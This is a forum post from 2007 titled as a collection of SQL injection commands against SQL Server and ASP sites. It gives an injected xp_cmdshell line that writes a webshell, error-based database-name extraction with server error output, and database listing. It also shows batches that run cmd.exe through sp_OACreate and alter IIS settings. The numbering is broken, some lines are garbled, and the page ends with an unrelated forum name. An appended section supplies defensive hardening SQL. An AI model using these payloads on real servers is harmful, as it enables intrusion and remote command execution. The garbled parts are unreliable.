The most detailed SQL injection related commands
Posted on 2007-7-15 22:20:28
1. Using the ^ escape character to write an ASP file (one-line webshell):
- http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^/script^> >c:\mu.asp';--

- echo ^>db_name(n): change n to 0,1,2,3... and you can cross into other databases
- http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp,行17

7. List the names of all current databases:
select * from master.dbo.sysdatabases -- lists the records with all columns
select name from master.dbo.sysdatabases -- lists only the name column

8. Running CMD commands on an injectable SQL Server without xp_cmdshell support:
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
-- Note: the 'true' argument to run means wait for the program to finish; it is required for long-running commands such as ping.

EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
-- Because fso's opentextfile method returns a textstream object, @file is now an object token

WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

drop TABLE MYTMP

----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
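Added example, not part of the original post: the server-side counter-measures for the techniques above, as a DBA would apply them on SQL Server. It disables the two features items 1 and 8 depend on (xp_cmdshell and the OLE Automation procedures), checks that the web application's login is not sysadmin, and replaces the concatenated `keyno=` query with a typed parameter so that a stacked `;exec ...` is rejected instead of executed. The login name `web_app`, the table `dbo.news` and its `keyno` column are assumed.

```sql
-- Hardening example (assumes sysadmin rights on the instance).
-- 1. Turn off the two features the post's items 1 and 8 rely on.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;               -- item 1: xp_cmdshell
EXEC sp_configure 'Ole Automation Procedures', 0; -- item 8: sp_OACreate / sp_OAMethod
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 2. Verify the running values; both should now be 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 3. Disabling the procedures is only a speed bump if the application login
--    is sysadmin, because sysadmin can simply re-enable them. Expect 0 here.
--    (assumed login name: web_app)
SELECT IS_SRVROLEMEMBER('sysadmin', 'web_app') AS web_app_is_sysadmin;

-- 4. Root cause of item 1: the id is concatenated into the batch, so
--    "1881;exec ..." becomes a second statement. Bind it as a typed
--    parameter instead. (assumed table: dbo.news with an INT column keyno)
DECLARE @raw NVARCHAR(100) = N'1881;exec master.dbo.xp_cmdshell ''dir''';  -- constructed hostile input
DECLARE @keyno INT = TRY_CONVERT(INT, @raw);   -- NULL: the payload is not an integer
IF @keyno IS NULL
    RAISERROR('invalid keyno', 16, 1);         -- rejected before any query runs
ELSE
    EXEC sp_executesql
        N'SELECT * FROM dbo.news WHERE keyno = @k',
        N'@k INT',
        @k = @keyno;
```

The error-based probe in item 7 (`convert(int, db_name())`) is closed on the web tier rather than here: the ASP page must return a generic error instead of the ODBC message shown in the post.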
光学薄膜论坛 (Optical Thin Film Forum)